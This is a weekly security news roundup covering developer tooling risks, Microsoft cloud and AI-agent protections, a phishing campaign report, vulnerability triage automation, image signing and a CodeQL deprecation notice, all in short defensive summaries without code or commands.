Weekly Security Roundup: AI Posture, Supply Chain, and Data Control
Security updates include coverage of risks in developer environments, AI and cloud posture, vulnerability triage, and new controls for workload and supply chain protection. Data governance remains a consistent theme.
Security in Developer Tooling and Workflows
An analysis covers risks from VS Code’s tasks.json, which can contain unsafe commands if included in shared repositories. These shortcuts might inadvertently expose engineers to unsafe code. Developers are encouraged to use isolated dev containers, scrutinize repos for automation files, and request stronger platform-level controls.
Cloud AI Security and Copilot Studio Protections
Microsoft Defender now offers unified management tools for AI risk in cloud environments (including Azure, AWS, GCP), mapping agent privileges and checking for prompt injection. Microsoft Copilot Studio’s runtime protection now includes automated webhook review to identify and stop unintended agent actions. These features combine with last week’s coverage of agent security.
- Securing AI Agents in the Cloud: Microsoft Defender's Approach
- Securing Microsoft Copilot Studio AI Agents with Defender Runtime Protection
Microsoft Fabric and OneLake: Fine-Grained Security Management
Fabric now offers REST APIs for OneLake that provide automated, path-based access controls. These APIs connect with Entra ID for fine-grained, CI/CD-ready permission management. OneLake security for mirrored databases gives detailed controls—reducing risks associated with excess permission or duplicate data.
- Granular REST APIs for OneLake Security Management in Microsoft Fabric
- Manage OneLake Security for Mirrored Databases in Microsoft Fabric
Threat Intelligence: Phishing Campaigns and BEC Countermeasures
Microsoft investigates new phishing and BEC attacks targeting the energy sector, including using SharePoint for multi-stage attacks that bypass filters and steal sessions. Attackers can add mailbox rules for persistence and erase evidence. The report covers detection, recovery, and analytics alongside remediation strategies, reinforcing best practices for defense.
Automating Vulnerability Detection and Management
GitHub Security Lab’s Taskflow Agent uses LLMs and rule books to automate vulnerability triage for Actions and JavaScript, filter out false positives, and connect with GitHub Issues. Modular YAML and prompt/task templates enable extensibility, helping teams systematically review reports and reduce manual work.
Secure Auth and Delegated Access Patterns in Cloud Services
A new guide explains how to use Microsoft Entra’s OAuth2 On-Behalf-Of flow for Python MCP servers (using FastMCP SDK), enabling developers to configure delegated, audited API access. Code samples and setup details help developers integrate secure user flows with existing cloud services.
Enhancing Supply Chain Security: Container Image Signing
Microsoft’s Notary Project and Artifact Signing (now GA) tools provide managed certificate handling for CI/CD and AKS—making it simpler to sign images, handle credentials, and use RBAC. The guides support migration from older image signing strategies.
Broader Identity and Data Security Guidance
A framework for 2026 outlines four priorities for identity and network access risk management: adaptive policies, governing users/agents, Zero Trust adoption, and credential controls. Platform integration (Defender, Purview, Verified ID) is central for compliance. Azure Essentials video content shows Purview’s main governance and audit features, complementing ongoing security automation content.
- 4 Priorities for AI-Powered Identity and Network Access Security in 2026
- Understand How Purview Secures and Governs Your Entire Data Estate
Other Security News
CodeQL Release 2.23.9 announces the deprecation of support for Kotlin 1.6/1.7 in February 2026. Users of these versions should upgrade. Guidance is available for GitHub Enterprise Server and CLI, echoing last week’s security tooling updates.